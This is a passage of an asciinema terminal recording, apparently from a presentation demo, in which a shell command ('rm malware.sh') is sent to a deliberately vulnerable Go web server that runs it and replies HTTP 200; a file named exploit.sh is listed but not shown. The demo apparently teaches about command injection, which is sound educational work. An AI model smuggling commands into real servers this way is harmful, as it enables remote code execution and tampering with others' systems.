[79.921269, "o", "\b"]
[79.95011, "o", "\b"]
[79.98013, "o", "\b"]
[80.432868, "o", "\u001b[C"]
[80.800204, "o", "\b\u001b[1P"]
[80.966404, "o", "\b\u001b[1P"]
[81.109996, "o", "\b\u001b[1P"]
[81.3384, "o", "\u001b[13;23r\u001b[H\u001b[23;65Hr malware.sh\u001b[1;24r\u001b[H\u001b[23;66H"]
[81.60666, "o", "\u001b[13;23r\u001b[H\u001b[23;66Hm malware.sh\u001b[1;24r\u001b[H\u001b[23;67H"]
[81.889307, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[1;24r\u001b[H\u001b[23d"]
[81.89075, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Crm\u001b[Cmalware.sh\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[81.904745, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Crm\u001b[Cmalware.sh\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[81.906684, "o", "\u001b[13;23r\u001b[H\u001b[23dHTTP/1.1\u001b[C200\u001b[COK\r\nServer:\u001b[CVery\u001b[CBad,\u001b[CNo\u001b[CGood,\u001b[CGo\u001b[CServer\r\nDate:\u001b[CSat,\u001b[C26\u001b[CJan\u001b[C2019\u001b[C22:06:05\u001b[CGMT\r\nContent-Length:\u001b[C0\r\n\n\u001b[1;24r\u001b[H\u001b[23d"]
[81.908167, "o", "\u001b[13;23r\u001b[H\u001b[23dbmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[1;24r\u001b[H\u001b[23;52H"]
[87.020213, "o", "\u001b[13;23r\u001b[H\u001b[23;52Hl\u001b[1;24r\u001b[H\u001b[23;53H"]
[87.131339, "o", "\u001b[13;23r\u001b[H\u001b[23;53Hs\u001b[1;24r\u001b[H\u001b[23;54H"]
[87.33143, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[1;24r\u001b[H\u001b[23d"]
[87.333345, "o", "\u001b[13;23r\u001b[H\u001b[23d\u001b[32m\u001b[1mexploit.sh\u001b[2C\u001b(B\u001b[mgo.mod\u001b[2Cmain.go\u001b[2CREADME.md\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[87.333789, "o", "\u001b[13;23r\u001b[H\u001b[23dbmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[1;24r\u001b[H\u001b[23;52H"]
[89.87637, "o", "\u001b[13;23r\u001b[H\u001b[13d\u001b[K\r\n\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[13dbmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[1;24r\u001b[H\u001b[13;52H"]
[90.014048, "o", "\u001b[?25l\u001b[24;1H\u001b[30m\u001b[42m[preso] 0:preso*                              \"bmitch-asusr556l\" 17:06 26-Jan-19\u001b(B\u001b[m\u001b[13;52H\u001b[?12l\u001b[?25h"]
[91.032641, "o", "\u001b[?25l\u001b[32m\u001b[12;1H─────────────────────────────────────────\u001b[39m───────────────────────────────────────\u001b(B\u001b[m\u001b[11;1H\u001b[?12l\u001b[?25h"]
[92.544531, "o", "\u001b[1;11r\u001b[H\u001b[11d^C\u001b[1;24r\u001b[H\u001b[11;3H"]
[92.54564, "o", "\u001b[1;11r\u001b[H\u001b[11;3Hsignal:\u001b[Cinterrupt\r\n\u001b[1;24r\u001b[H\u001b[10B"]
[93.249479, "o", "\u001b[1;11r\u001b[H\u001b[11dbmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[1;24r\u001b[H\u001b[11;52H"]
[94.200435, "o", "\u001b[1;11r\u001b[H\u001b[K\r\n\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[Hbmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[1;24r\u001b[H\u001b[51C"]
[96.140829, "o", "\u001b[1;24r\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b]112\u0007\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[?1049l"]
[96.141083, "o", "[detached (from session preso)]\r\n"]
